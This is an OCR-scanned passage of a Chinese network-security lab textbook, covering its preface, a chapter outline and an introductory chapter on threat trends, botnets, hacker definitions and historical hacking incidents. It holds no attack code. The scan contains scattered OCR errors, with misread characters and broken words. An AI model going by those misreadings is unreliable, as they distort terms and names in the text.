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本 书 基于 网 络 安全 体系 结构 ,选择 最 新 的 网 络 安全 实用 软件 和 技术 ,在 基本 的 网 络 安全 实用 技术 和 理 
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讲授 网 络 安全 实验 内 容 。 通 过 基础 网 络 安全 体系 结构 基本 理论 和 方法 的 学 习 和 实验 训练 ,使 学 生 建 立 网 
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1 写作 背景 

目前 ,我 国 高 等 教育 的 信息 安全 学 科 和 专业 方向 设置 问题 受到 非常 大 的 关注 。 对 于 信 
息 安 全 专业 的 本 科 生 教育 而 言 , 其 基本 的 培养 方案 .课程 设置 和 教学 大 纲 都 需要 根据 新 的 形 
势 发 生变 革 ,保密 与 信息 安全 专业 方向 也 在 积极 地 进行 准备 。 

在 新 形势 下 ,对 于 信息 安全 专业 人 才 的 培养 标准 是 具有 宽厚 的 理工 基础 ,掌握 信息 科学 
和 管理 科学 专业 基础 知识 ,系统 掌握 信息 安全 与 保密 专业 知识 ,具有 良好 的 学 习 能 力 、 分 析 
与 解决 问题 能 力 、 实 践 与 创新 能 力 。 特 别 是 在 能 力 方面 ,要 求 本 专业 学 生 能 够 做 到 具有 设计 
和 开发 信息 安全 与 防范 系统 的 基本 能 力 ,具有 获取 信息 和 运用 知识 解决 实际 问题 的 能 力 , 具 
有 和 良好 的 专业 实践 能 力 和 基本 的 科研 能 力 。 

实践 学 时 的 设置 不 仅 起 到 加 深 学 生 对 理论 课 所 学 知识 的 理解 的 作用 ,还 有 助 于 培养 学 
生 形 成 理论 与 实践 相 结合 解决 实际 问题 的 能 力 。 对 于 实现 当前 的 高 等 教育 改革 目标 ,提高 
毕业 生 综 合 素质 具有 重要 的 意义 。 但 是 , 受 实 验 设备 所 限 , 各 课程 的 实验 环节 比较 分 散 ,分 
布 在 不 同 的 实验 平台 或 实验 课程 中 ,缺乏 连贯 性 和 整体 性 。 网 络 安全 课程 实践 环节 的 设立 ， 
是 对 计算 机 网 络 .现代 密码 学 .信息 系统 安全 、 网 络 安全 .软件 安全 和 信息 安全 管理 等 专业 核 
心 课 程 的 有 效 支 撑 。 

本 教材 的 编写 思路 是 从 网 络 安全 的 体系 架构 中 ,确定 需要 重点 讲授 和 考核 的 内 容 , 并 针 
对 具体 内 容 选 择 最 具 代表 性 的 实用 型 软件 工具 或 主流 技术 ,将 基础 实验 和 扩展 实验 相 结合 ， 
既 满 足 日 常 的 实验 教学 活动 ,又 能 够 促进 学 生 创 新 实践 能 力 的 培养 和 提高 。 

2. 本 书 特点 

本 书 兼顾 高 等 学 校 理论 教学 与 学 生 实践 能 力 培养 的 需求 ,借鉴 国外 名 校 信息 安全 专业 
课程 设置 及 相关 课程 内 容 安排 ,组 织 相关 理论 知识 ,设计 实验 用 例 ,力争 理论 详尽 .用 例 科 
学 .指导 到 位 。 配 合 高 等 学 校 的 计算 机 网 络 、 现 代 密 码 学 .信息 系统 安全 、 网 络 安全 .软件 安 
全 和 信息 安全 管理 等 课程 的 实践 教学 环节 ,突出 实用 性 ,所 有 实验 可 操作 性 强 ,与 实践 结合 
紧密 。 本 书 不 仅 介 绍 网 络 安全 的 核心 理论 和 主要 技术 ,更 着 重 介绍 在 网 络 安全 管理 和 实践 
过 程 中 如 何 运 用 系统 软件 支撑 和 维护 网 络 健康 运行 。 

本 书 可 以 作为 信息 安全 专业 及 相关 专业 计算 机 网 络 、 现 代 密 码 学 .信息 系统 安全 、 网 络 
安全 和 信息 安全 管理 等 课程 的 实践 教材 , 书 中 的 全 部 实验 示例 都 经 过 精心 的 设计 和 完全 的 
调试 ,可 以 放心 使 用 。 

3. 内 容 安排 

本 书 的 内 容 安 排 如 下 : 

> 第 1 章 介绍 网 络 安全 的 基本 概念 和 发 展 历程 ,以 及 网 络 安全 与 信息 安全 的 密切 联 

系 ,并 介绍 网 络 安全 实验 的 特点 和 基本 要 求 。 
> 第 2 章 介绍 网 络 安全 的 研究 意义 和 研究 内 容 , 主要 包括 密码 学 .防火 墙 技术 .网 络 人 
侵 检测 .数据 备份 与 容 灾 、 防 病毒 技术 ,并 介绍 网 络 身份 认证 技术 。 





> 第 3 章 介绍 网 络 分 析 实 验 的 原理 和 技术 ,重点 介绍 基于 Sniffer Pro 嗅 探 软 件 的 数据 
包 捕 获 和 网 络 监视 等 功能 ,并 增加 对 多 种 网 络 协议 进行 嗅 探 分 析 的 扩展 实验 环节 。 
> 第 4 章 介绍 远程 控制 软件 pcAnywhere 的 安装 和 使 用 方法 ,讲解 主 控 端 .被 控 端 的 配 
置 方法 ,并 介绍 远程 文件 控制 的 操作 方式 。 
> 第 5 章 介绍 内 存 溢出 的 概念 .并 介绍 针对 内 存 溢出 的 漏洞 攻击 实验 。 
> 第 6 章 介绍 防火 墙 技术 ,并 结合 天 网 防火 墙 和 瑞星 防火 墙 ,讲述 防火 墙 的 使 用 及 配 
置 方法 。 
> 第 7 章 介绍 人 侵 检测 技术 ,重点 讲述 Snort 入 侵 检测 工具 的 使 用 方法 。 
> 第 8 章 讨 论 常 见 的 Web 漏洞 ,并 介绍 针对 Web 漏洞 扫描 攻击 实验 。 
> 第 9.10、11、12、13、14 章 分 别 介绍 主机 探测 及 端口 扫描 实验 .口令 破解 及 安全 加 密 
电邮 实验 .自动 化 浏览 器 攻击 实验 .木马 植 人 与 防范 实验 .邮件 钓鱼 社会 工程 学 实 
验 、 网 络 服务 扫描 实验 。 
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HIR 网 络 安全 实验 概述 


1.1 引 论 


1.1.1 网 络 安全 现状 及 发 展 


网 络 安全 是 指 网 络 系统 的 软件 、 硬 件 及 其 存储 的 数据 处 于 保护 状态 ,网 络 系统 不 会 由 于 
偶然 的 或 者 恶意 的 冲击 而 受到 破坏 ,网 络 系统 能 够 连续 可 靠 地 运行 。 网 络 安全 是 一 门 涉及 
计算 机 科学 、 网 络 技术 、 通 信 技 术 、 密 码 技术 ,信息 安全 技术 、 应 用 数学 和 信息 论 等 多 研究 领 
域 的 综合 性 学 科 。 概 括 地 说 ,凡是 涉及 网 络 系 统 的 保密 性 、 完 整 性 、 可 用 性 和 可 控 性 的 相关 
技术 和 理论 都 是 网 络 安全 的 研究 内 容 。 


1.1.1.1 网 络 安全 问题 


随 着 计算 机 技术 和 互联 网 技术 的 飞速 发 展 ,数字 化 信息 已 经 成 为 社会 发 展 的 重要 保证 。 
例如 ,数字 化 城市 .数字 化 国防 的 建设 都 需要 大 量 网 络 信息 支持 。 快 速 发 展 的 各 类 网 络 将 这 
些 数字 信息 紧密 地 联系 在 一 起 ,与 之 相伴 的 是 随时 可 能 发 生 的 各 类 安全 问题 。 

。 人 为 安全 问题 : 信息 泄漏 信息 窃取 、 数 据 筑 改 .计算 机 病毒 。 

: 设备 安全 问题 : 自然 灾害 、 设 计 缺 陷 . 电 磁 辐 射 。 

2016 年 6 月 ,国家 计算 机 网 络 应 急 技术 处 理 协调 中 心 发 布 了 (2015 年 中 国 互联 网 网 络 
安全 报告 》 报 告 对 我 国 目 前 的 网 络 安全 状况 进行 了 总 体 分 析 ,总体 状 况 概 括 为 以 下 几 点 : 

。 基础 通信 网 络 安全 防护 水 平 进一步 提升 。 

。 我 国 域名 系统 防御 拒绝 服务 攻击 能 力 显 著 提升 。 

。 工业 互联 网 面临 的 网 络 安全 威胁 加 剧 。 

。 针对 我 国 重要 信息 系统 的 高 强度 有 组 织 攻击 威胁 形势 严峻 。 

。 我 国境 内 木马 和 僵尸 网 络 控制 端 数量 下 降 , 首 次 出 现 境 外 木马 和 僵尸 网 络 控制 端 数 

量 多 于 国内 的 现象 。 

。 个 人 信息 泄露 事件 频繁 发 生 , 个 人 信息 泄露 引发 网 络 诈骗 和 勒索 等 "后遗症 ”。 

。 移动 互联 网 恶意 程序 数量 大 幅 增长 ,大量 移 动 恶意 程序 的 传播 渠道 转移 到 网 盘 或 广 
告 平台 等 网 站 ,应 用 软件 供应 链接 安全 问题 凸显 。 

* DDoS 攻击 仍然 是 我 国 互联 网 面临 的 严重 安全 威胁 之 一 。 

。 网 络 安全 高 危 漏 洞 频 现 ,网 络 设备 安全 漏洞 风险 依然 较 大 ,涉及 重要 行业 和 政府 部 
门 的 高 危 漏洞 事件 持续 增多 ,修复 进度 未 跟 上 步伐 ,智能 联网 设备 暴露 出 的 安全 漏 
洞 问题 严重 。 

。 网 页 仿冒 和 网 页 算 改 事件 暴涨 . 植 信 暗 链 是 网 页 算 改 的 主要 攻击 方式 。 


1.1.1.2 网 络 安全 技术 


网 络 安全 技术 主要 包括 防火 墙 技 术 、 入 侵 检测 技术 以 及 防 病 毒 技术 。 这 3 种 网 络 安全 
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技术 还 是 针对 数据 、 单 一 系统 以 及 软 硬 件 本 身 的 安全 保障 。 

首先 ,从 用 户 角 度 来 看 ,虽然 安装 了 防火 墙 ,但 是 仍 避 免不了 蠕虫 、 垃 圾 邮件 、 病 毒 以 及 
拒绝 服务 攻击 等 网 络 危害 事件 的 发 生 。 

其 次 ,入 侵 检测 产品 在 提前 预警 方面 存在 不 足 , 对 于 危害 程序 和 代码 的 精确 定位 以 及 系 
统 全 局 管理 能 力 还 有 很 大 的 提升 空间 。 

最 后 ,虽然 很 多 用 户 在 系统 终端 上 都 安装 了 防 病毒 产品 ,但 是 内 网 安全 问题 仍然 突出 ， 
尤其 是 安全 策略 的 执行 、 外 来 非法 侵入 、 补 丁 管理 以 及 操作 行为 规范 制订 等 方面 。 

目前 来 看 ,网 络 安全 的 防护 重点 将 集中 在 信息 语义 范畴 和 网 络 行为 。 


1.1.1.3 网 络 安全 发 展 趋势 


在 网 络 混合 攻击 时 代 , 功 能 单一 的 防火 墙 系统 无 法 满足 业务 的 需要 ,防火 墙 技术 必须 具 
备 多 种 安全 功能 ,如 基于 应 用 协议 层 防御 、 低 误 报 率 检 测 、 高 可 靠 高 性 能 平台 和 统一 组 件 化 
管理 技术 等 ,由 此 UTM(Unified Threat Management ,统一 威胁 管理 ) 技 术 应 运 而 生 。 

UTM 在 统一 的 产品 管理 平台 下 , 集 防火 墙 \VPN、 网 关 防 病毒 .IPS 和 防御 拒绝 服务 攻 
击 等 众多 产品 功能 于 一 体 ,实现 了 多 种 防御 功能 ,向 UTM 方向 演进 将 是 防火 墙 的 发 展 
趋势 。 

UTM 设备 应 具备 以 下 特点 。 

COD 网 络 安全 协议 层 防御 。 主 要 针对 IP 地 址 、 端 口 等 静态 信息 进行 防护 和 控制 ,除了 
传统 的 访问 控制 外 ,还 需 对 垃圾 邮件 .拒绝 服务 .黑客 攻击 等 外 部 威胁 进行 综合 检测 和 主动 
防御 。 

(2) 通过 分 类 检测 技术 降低 误 报 率 。 串 联接 人 的 网 关 设 备 一 旦 误 报 过 高 ,将 会 严重 影 
响 系 统 的 正常 服务 ,给 用 户 带 来 灾难 性 的 后 果 。IPS 理念 在 20 世纪 90 年 代 就 被 提出 ,但 是 
目前 IPS 部 署 非常 有 限 , 影 响 其 部 署 的 一 个 重要 问题 就 是 误 报 率 过 高 。 分 类 检测 技术 可 以 
大 幅度 降低 误 报 率 ,针对 不 同 的 攻击 类 型 ,采取 不 同 的 检测 技术 ,如 防御 拒绝 服务 攻击 、 防 里 
忠和 黑客 攻击 、 防 垃圾 邮件 攻击 等 ,从 而 显著 降低 误 报 率 。 

G) 高 可 靠 性 、 高 性 能 的 硬件 支撑 平台 。 

(4) 一 体 化 管理 。UTM 设备 具有 能 够 统一 控制 和 管理 的 平台 ,使 用 户 能 够 有 效 地 管 
理 。 设 备 平台 可 以 实现 标准 化 并 具有 可 扩展 性 ,用 户 可 在 统一 的 平台 上 进行 组 件 管理 , 同 
时 ,一 体 化 管理 也 能 消除 信息 产品 之 间 由 于 无 法 沟通 而 带 来 的 信息 孤岛 ,从 而 在 应 对 各 种 各 
样 攻 击 威胁 的 时 候 , 更 好 地 保障 用 户 的 网 络 安全 。 


1.1.1.4 网 络 威胁 趋势 分 析 


在 信息 网 络 普及 的 时 代 , 信 息 安 全 威胁 随时 存在 , 且 不 断 增 加 ,信息 网 络 安全 性 正 逐 步 
得 到 人 们 的 重视 。 在 当前 复杂 的 网 络 应 用 环境 下 ,信息 网 络 所 面临 的 安全 形势 异常 严峻 。 
来 自 中 国电 子 商 务 研究 中 心 的 报告 列举 了 如 下 严重 的 网 络 威胁 。 

COD 垃圾 邮件 和 网 络 欺骗 。 

社交 网 站 成 为 网 络 安全 的 重 灾 区 2010 年 .Koobface 蠕虫 等 安全 问题 对 社交 网 站 用 户 
带 来 巨大 威胁 。 从 这 些 软件 攻击 过 程 来 看 , 正 逐 步 由 攻击 系统 、 窍 取 资 料 的 被 动 方 式 转变 为 
主动 攻击 模式 。 安 全 专家 认为 ,恶意 软件 作者 正在 拓展 攻击 范围 ,把 恶意 软件 植 和 人 社交 网 站 
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思科 公司 在 其 2009 年 (年 度 安全 报告 ) 中 揭示 了 社交 媒体 (尤其 是 社交 网 络 ) 对 网 络 安 
全 的 影响 ,并 探讨 了 个 体 本 身 在 为 网 络 犯罪 创造 机 会 方面 所 起 的 关键 作用 。 社 交 网 络 已 经 
成 为 网 络 犯罪 的 导 火 索 ,网 站 成 员 过 于 信任 社区 伙伴 ,根本 没有 采取 任何 阻止 恶意 软件 和 计 
算 机 病毒 的 预防 措施 。 这 些 不 良 用 户 行为 以 及 系统 、 操 作 漏洞 结合 在 一 起 具有 不 可 估量 的 
破坏 性 ,将 大 幅 增 加 网 络 安全 风险 。 

2015 年 ,我 国 发 生 多 起 危害 严重 的 个 人 信息 泄露 事件 。 例 如 , 某 应 用 商店 用 户 信息 汇 
露 事件 、 约 10 万 条 应 届 高 考 考 生 信息 泄露 事件 、 酒 上 店 人 住 信息 泄露 事件 、 某 票务 系统 近 600 
用 户 信息 泄露 事件 等 。 此 外 ,个 人 信息 泄露 事件 频繁 被 媒体 报道 ,反映 出 社会 对 此 类 问题 的 
关注 度 不 断 提 升 。 

(2) 云 计 算 为 网 络 犯罪 提供 了 新 的 技术 。 

云 计 算 在 2009 年 取得 了 长 足 的 发 展 , 但 应 该 清醒 地 认识 到 : 市 场 的 快速 发 展会 牺牲 一 
定 的 安全 性 ,攻击 者 今后 将 把 更 多 的 时 间 用 于 挖掘 云 计算 服务 提供 商 的 API( 应 用 编程 接 
口 ) 漏洞 方面 。 

随 着 越 来 越 多 的 YT 功能 通过 云 计算 来 提供 ,网 络 犯罪 也 顺应 了 这 一 趋势 。 网 络 攻击 
者 和 黑客 也 将 效仿 企业 做 法 使 用 基于 云 计 算 的 工具 ,以 便 更 有 效 地 部 署 远程 攻击 ,甚至 借 此 
大 幅 拓 展 攻 击 范围 。 

云 提供 了 许多 工具 ,可 以 帮助 黑客 ,特别 是 那些 用 偷 来 的 信用 卡 和 假 的 IP 地 址 来 获取 
资源 的 黑客 ,他 们 的 活动 难以 追查 。 正 如 《计算 机 世界 》 中 * 云 中 的 密码 破解 "文章 中 指出 的 
那样 ,黑客 可 以 利用 基于 云 的 计算 资源 ,例如 破解 密码 ,这 是 一 个 强力 的 技术 ,破解 一 个 中 等 
长 度 和 中 等 复杂 程度 的 密码 都 需要 很 长 的 时 间 和 大 量 的 计算 资源 。 文 章 指出 了 当 破 解密 码 
时 僵尸 网 络 和 云 的 关系 :“ 对 于 一 个 黑客 来 说 ,可 用 于 需要 的 计算 的 资源 有 两 大 来 源 , 一 个 
是 消费 者 个 人 计算 机 组 成 的 僵尸 网 络 , 另 一 个 是 由 服务 提供 商 提供 的 “基础 设施 作为 一 种 服 
务 (iaas) "的 云 。 任 何 一 个 都 能 够 提供 强大 的 计算 能 力 , 都 可 满足 专用 的 计算 需求 ”。 对 于 
云 计算 将 被 黑客 利用 这 个 严峻 的 问题 ,各 大 安全 公司 都 把 精力 放 在 与 云 计 算 相 关 的 安全 服 
务 上 ,提供 加 密 、 目 录 管 理 ` 反 垃圾 邮件 和 恶意 程序 扫描 等 各 类 解决 方案 。 据 悉 ,著名 安全 评 
测 机 构 VB100 号 召 安全 行业 联合 起 来 ,组 成 一 个 对 抗 恶 意 程序 的 共同 体 ,分 享 技术 和 资源 。 

(3) 智能 手机 安全 问题 愈 发 严重 。 

随 着 移动 应 用 的 不 断 增多 ,智能 设备 的 受 攻击 范围 也 在 不 断 扩大 ,移动 安全 所 面临 的 问 
题 将 会 越 来 越 严 重 。 目 前 ,已 经 出 现 了 手机 蠕虫 病毒 和 智能 手机 盗号 木马 病毒 ,虽然 这 些 病 
毒 不 能 自我 传播 ,还 需要 依靠 计算 机 来 传播 ,但 是 可 以 预计 到 ,具有 自我 传播 能 力 的 病毒 势 
必 出 现 ,将 严重 威胁 各 类 移动 终端 设备 。 针 对 安 卓 平台 的 窃取 用 户 短信 、 通 讯 短 、 微 信 聊 天 
记录 等 信息 的 恶意 程序 将 会 爆发 。 安 卓 平台 感染 此 类 恶意 程序 后 ,大 量 涉及 个 人 隐私 的 信 
息 通过 邮件 发 送 到 指定 邮箱 。 

总 体 而 言 , 安 全 专家 认为 , 随 着 智能 手机 业务 范围 的 拓展 ,用 户 利用 手机 来 处 理 银行 交 
易 、 社 交 网 站 和 其 他 业务 ,黑客 将 越 来 越发 关注 这 一 攻击 领域 。 

(4) 搜索 引擎 成 为 黑客 全 新 的 赢利 方式 。 

黑客 不 断 寻 找 新 的 方法 借助 钓鱼 网 站 吸引 用 户 , 利 用 搜索 引擎 优化 技术 展开 攻击 便 是 
其 中 的 一 种 方法 。 谷 歌 (Google) 和 必 应 (Bing) 对 实时 搜索 的 支持 也 将 吸引 黑客 进一步 提升 

和 3. 








相关 技术 。 作 为 一 种 攻击 渠道 ,搜索 引擎 是 非常 理想 的 选择 ,因为 用 户 通常 都 非常 信任 搜索 
引擎 ,对 于 排 在 前 几 位 的 搜索 结果 更 是 没有 任何 怀疑 ,这 就 给 了 黑客 可 乘 之 机 ,从 而 对 用 户 
发 动 攻击 。 

(5)“ 僵 尸 网 络 ? 继 续 猩 铬 。 

所 谓 僵尸 ,是 指 受 恶意 软件 感染 而 被 犯罪 分 子 远程 操控 的 个 人 计算 机 。 犯 罪 分 子 通过 
网 络 将 病毒 植 人 成 千 上 万 台 个 人 计算 机 ,实现 大 范围 的 操控 ,犯罪 分 子 使 用 这 些 计算 机 进行 
各 种 网 络 犯罪 ,如 垃圾 邮件 发 送 、. 服 务 阻 断 攻击 、 网 络 钓鱼 及 非法 主机 攻击 等 ,基本 履 盖 了 所 
有 网 络 犯罪 行为 。 从 当前 的 网 络 安全 态势 来 看 , 愈 来 愈 多 的 计算 机 皆 受 到 感染 ,而 被 感染 的 
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2015 4E 12 月 2 日 ,全 国 各 执法 机 构 在 微软 安全 研究 人 员 的 协助 下 ,成 功 地 摧毁 了 由 恶 
意 软件 Win32/Dorkbot 组 成 的 大 型 僵尸 网 络 。 该 僵尸 网 络 的 影响 非常 广泛 ,已 经 感染 了 
190 多 个 国家 的 一 百 多 万 台 个 人 计算 机 。Dorkbot 主要 通过 USB 闪存 .即时 通信 软件 和 社 
交 网 络 进行 传播 。 它 不 仅 盗 取 用 户 和 凭证 和 个 人 信息 .关闭 安全 保护 软件 ,而且 还 会 传播 其 他 
多 种 流行 恶意 软件 ,影响 非常 恶劣 。 

(6) 传统 攻击 方式 再 度 兴起 。 

IBM X-Force 团队 预计 ,大 规模 蠕虫 攻击 将 再 度 兴起 ,与 此 同时 ,DDoS( 分 布 式 拒绝 服 
务 攻击 ) 也 将 重新 成 为 主流 攻击 方式 ,木马 病毒 仍 将 占据 主要 地 位 。 

来 自 中 国电 子 商 务 研究 中 心 的 报告 显示 , 据 Websense 的 卢 纳 德 预 计 , 电 子 邮 件 攻击 也 
有 重新 抬头 之 势 。 研 究 人 员 已 经 发 现 , 通 过 PDF 等 邮件 附件 发 动 的 攻击 开始 增加 。 卢 纳 德 
说 :“ 恶 意 邮 件 攻 击 在 2005 年 至 2008 年 期 间 已 经 销声匿迹 。 而 现在 不 知 出 于 何 种 原因 ,这 
种 攻击 方式 又 再 度 出 现 ”。 根 据 中 国 互联 网 协会 组 织 的 2014 年 第 四 季度 中 国 反 垃 圾 邮件 状 
况 调查 报告 显示 ,用 户 电子 邮箱 平均 每 周 接收 到 的 全 部 邮件 数量 为 35. 0 封 , 平 均 每 周 接收 
到 的 垃圾 邮件 数量 为 14. 3 封 ,垃圾 邮件 占 比 是 41. 0%。 

从 网 络 威胁 方式 来 看 ,威胁 方式 的 演进 主要 体现 在 以 下 几 个 方面 。 

(1) 实施 网 络 攻击 的 主体 发 生 了 变化 。 

实施 网 络 攻 击 的 主要 人 群 正 由 好 奇 心 重 、 炫 粹 攻 防 能 力 的 兴趣 型 黑客 群 ,向 更 具 犯 罪 思 
想 的 启 利 型 攻击 人 群 过 渡 , 针 对 终端 系统 漏洞 实施 “zero-day 攻击 ”和 利用 网 络 攻击 获取 经 
济 利益 逐步 成 为 主要 趋势 。 其 中 ,以 伪 尸 网 络 、 间 谍 软 件 为 手段 的 恶意 代码 攻击 ,以 敲诈 勒 
索 为 目的 的 分 布 式 拒绝 服务 攻击 ,以 网 络 仿 冒 、 网 址 嫁接 、 网 络 动 持 等 方式 进行 的 在 线 身 份 
窃取 等 安全 事件 持续 快速 增加 ,而 针对 P2P、IM 等 新 型 网 络 应 用 的 安全 攻击 也 在 迅速 发 展 。 

(2) 企业 对 安全 威胁 的 认识 发 生 了 变化 。 

过 去 ,企业 信息 网 络 安全 的 防护 中 心 一 直 定 位 于 网 络 边界 及 核心 数据 区 ,通过 部 署 各 种 
各 样 的 安全 设备 来 实现 安全 保障 。 但 是 , 随 着 企业 信息 边界 安全 体系 的 基本 完善 ,信息 安全 
事件 仍然 层出不穷 。 企 业内 部 人 员 安 全 管理 不 足 `. 办 公 时 间 肆 意 上 网 、. 计 算 机 使 用 不 当 等 行 
为 都 使 网 络 信息 安全 风险 变 得 更 为 严重 。 

(3) 安全 攻击 的 主要 手段 发 生 了 变化 。 

安全 攻击 的 手段 多 种 多 样 ,典型 的 手段 包含 拒绝 服务 攻击 、 非 法 接 入 、IP 欺骗 .网 络 嗅 
探 \ 木 马 攻击 以 及 垃圾 邮件 等 。 随 着 攻击 技术 的 发 展 ,攻击 手段 正 由 单一 攻击 模式 向 多 种 攻 
击 手段 结合 的 复合 性 攻击 发 展 。 结 合 多 种 攻击 手段 的 复合 模式 所 带 来 的 危害 远 远 大 于 单一 
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模式 的 攻击 ,而 且 更 加 难以 控制 。 
1.1.2 黑客 及 黑客 入 侵 技 术 


1.1.2.1 黑客 定义 


黑客 是 计算 机 专业 中 的 一 个 特殊 的 群体 , 随 着 计算 机 系统 被 攻击 报道 的 逐渐 增多 ,黑客 
越发 成 为 业界 的 关注 焦点 “黑客 ?是 英文 hacker 一 词 的 音译 ,是 指 计 算 机 系统 的 非法 和 
侵 者 。 

在 早期 麻 省 理工 学 院 的 校园 但 语 中 ,黑客 ”有 "恶作剧 ”之 意 , 尤 指 手法 巧妙 、 技 术 高 明 
的 恶作剧 ;在 日 本 《新 黑客 词典 ) 中 ,黑客 的 定义 是 “喜欢 探索 软件 程序 奥秘 ,并 从 中 增长 了 个 
人 才干 的 人 ”。 目 前 ,黑客 的 准确 界定 为 “以 保护 网 络 为 目的 ,具有 硬 软件 高 级 知识 ,有 能 力 
通过 创新 的 方法 放 析 系统 的 技术 精英 ,他们 以 侵入 为 手段 找 出 网 络 漏洞 ,进而 令 互联 网 络 趋 
于 完善 和 安全 。” 一 般 认为 ,黑客 起 源 于 20 世纪 50 年 代 麻 省 理工 学 院 的 实验 室 ,他 们 热衷 于 
解决 难题 。 

20 世纪 60 ERE 70 年 代 , 黑 客 " 富 于 褒 义 , 专 指 那些 独立 思考 .奉公 守法 的 计算 机 爱 
好 者 ,这 些 人 智力 超群 ,对 计算 机 技术 全 身心 投入 ,在 他 们 看 来 ,黑客 活动 意味 着 对 计算 机 的 
最 大 潜力 进行 智力 上 的 自由 探索 ,为 计算 机 技术 的 发 展 做 出 巨大 贡献 。 正 是 这 些 黑客 ,倡导 
了 一 场 个 人 计算 机 革命 ,倡导 了 现行 的 计算 机 开放 式 体系 结构 。 现 在 黑客 使 用 的 入侵 计算 
机 系统 的 基本 技巧 ,如 破解 口令 (password cracking), FF R fi (trapdoor), Æ JA t] 
(backdoor) .安放 特洛伊 木马 (Trojan horse) 等 ,都 是 在 这 一 时 期 发 明 的 。 从 事 黑客 活动 的 
经 历 ,成 为 后 来 许多 计算 机 业 巨 子 简历 上 不 可 或 缺 的 一 部 分 。 例 如 ,苹果 公司 创始 人 之 一 乔 
布 斯 就 是 一 个 典型 的 例子 。 

到 了 20 世纪 80 年 代 至 90 年 代 , 计 算 机 越 来 越 重 要 ,大 型 数据 库 也 越 来 越 多 ,信息 越 来 
越 集 中 在 少数 人 的 手 里 。 黑 客 认 为 ,信息 应 该 共享 而 不 应 被 少数 人 所 垄断 ,于 是 将 注意 力 转 
移 到 涉及 各 种 机 密 的 信息 数据 库 上 。 而 这 时 ,计算 机 化 空间 已 私有 化 ,成 为 个 人 拥有 的 财 
产 ,社会 不 能 再 对 黑客 行为 放任 不 管 ,必须 采取 行动 ,利用 法 律 等 手段 来 进行 控制 。 黑 客 活 
动 受到 了 打击 。 目 前 ,许多 政府 机 构 已 经 邀请 黑客 为 他 们 检验 系统 的 安全 性 ,甚至 还 请 他 们 
设计 新 的 安保 规程 。 

与 黑客 相对 的 是 骇 客 ,“ 骇 客 ” 是 cracker 的 音译 ,就 是 “破坏 者 ”的 意思 。 骇 客 是 贬义 
的 , 骇 客 做 的 事情 更 多 的 是 破解 商业 软件 .恶意 入 侵 别 人 的 网 站 并 造成 损失 。 利 用 网 络 漏洞 
破坏 网 络 ,他 们 具备 广泛 的 计算 机 知识 ,但 与 黑客 不 同 的 是 他 们 以 破坏 为 目的 。 

黑客 和 骇 客 的 基本 差异 在 于 ,黑客 是 有 建设 性 的 ,而 骇 客 则 专门 搞 破坏 。 对 一 个 黑客 来 
说 ,学 会 人 侵 和 破解 是 必要 的 ,但 最 主要 的 还 是 编程 。 对 于 一 个 骇 客 来 说 ,他 们 只 追求 人 侵 
的 快感 ,不 在 乎 技术 ,他 们 不 会 编程 ,不 知道 人 侵 的 具体 细节 。 还 有 一 种 情况 是 试图 破解 某 
系统 或 网 络 以 提醒 该 系统 所 有 者 的 系统 安全 漏洞 .这 群 人 往往 被 称 为 “ 白 帆 黑客 “匿名 客 ” 
(sneaker) 或 “ 红 客 ”。 许 多 这 样 的 人 是 计算 机 安全 公司 的 雇员 ,并 在 完全 合法 的 情况 下 攻击 
某 系统 。 


1.1.2.2 黑客 活动 
黑客 的 主要 活动 内 容 包 括 以 下 几 个 方面 : 





D 作为 一 个 黑客 ,在 找到 系统 漏洞 并 侵入 的 时 候 ,往往 都 会 很 小 心地 避免 造成 损失 ， 
并 且 善 意 地 提醒 系统 管理 员 ,但 是 在 这 过 程 中 会 有 许多 因素 都 是 未 知 的 ,没有 人 能 肯定 最 终 
会 是 什么 结果 ,因此 ,一 个 好 的 黑客 不 会 随便 攻击 个 人 用 户 及 站 点 。 

(2) 编写 一 些 有 用 的 开源 软件 ,这 些 软件 都 是 免费 的 公开 的 。 

(3) 帮助 别 的 黑客 测试 和 调试 软件 。 

CD. 黑客 们 都 以 探索 漏洞 与 编写 程序 为 乐 , 在 黑客 的 圈子 里 ,有 许多 其 他 事情 可 做 , 例 
如 ,维护 和 管理 相关 的 黑客 论坛 .新 闻 组 以 及 邮件 列表 ,维持 大 的 软件 供应 站 点 ,推动 RFC 
和 其 他 技术 标准 ,等 等 。 

(5) 真正 的 黑客 不 会 随意 破解 商业 软件 并 将 其 广泛 流传 ,也 不 会 恶意 侵入 别人 的 网 站 
并 造成 损失 ,黑客 的 所 作 所 为 应 当 更 像 是 对 于 网 络 安全 的 监督 。 


1.1.2.3 黑客 事件 


历史 上 ,发 生 过 许多 著名 的 黑客 人 侵 事 件 。 

1979 年 ,年 仅 15 岁 的 凯 文 。 米 特 尼克 仅 赁 一 台 计 算 机 和 一 部 调制 解 调 器 冯 人 了 北美 
空中 防务 指挥 部 的 计算 机 主机 。 

1987 年 , 美 联 邦 执法 部 门 指控 16 岁 的 赫 尔 伯 特 。 齐 恩 冯 和 人 美国 电话 电报 公司 的 内 部 网 
络 和 中 心 交换 系统 。 齐 恩 是 美国 1986 年 “计算 机 欺诈 与 滥用 法 案 ” 生 效 后 被 判 有 罪 的 第 一 人 。 

1988 年 ,年 仅 23 岁 的 大 学 生 Robert Morris 在 Internet. 上 释放 了 世界 上 首 个 “蠕虫 > 程 
序 。Robert Morris 最 初 是 把 这 个 99 行 的 程序 放 在 互联 网 上 进行 试验 ,可 结果 却 使 得 他 的 
计算 机 被 感染 并 迅速 在 互联 网 上 蔓延。Robert Morris 也 因此 在 1990 年 被 判 人 狱 。 

1990 年 ,为 了 获得 在 美国 洛杉矶 地 区 kiis-fm 电台 第 102 个 呼 入 者 的 奖励 一 一 保时捷 
跑车 ,Kevin Poulsen 控制 了 整个 地 区 的 电话 系统 ,以 确保 他 是 第 102 个 呼 和 人 者。 最 终 , 他 如 
愿 以 偿 获得 跑车 并 为 此 入 狱 3 年 。 

1995 年 ,来 自 俄罗斯 的 黑客 Vladimir Levin 成 为 历史 上 第 一 个 通过 入 侵 银行 计算 机 系 
统 来 获 利 的 黑客 ,他 侵入 美国 花旗 银行 并 盗 走 1000 万 美元 。 

1996 年 ,美国 黑客 Timothy Lloyd 曾 将 一 个 6 行 的 恶意 软件 放 在 了 其 雇主 一 一 Omega 
工程 公司 (美国 航天 航空 局 和 美国 海军 最 大 的 供 货 商 ) 的 网 络 上 ,此 事件 导致 Omega 公司 损 
失 1000 万 美元 。 

1999 年 , Melissa 病毒 是 世界 上 首 个 具有 全 球 破坏 力 的 病毒 。David Smith 在 编写 此 病 
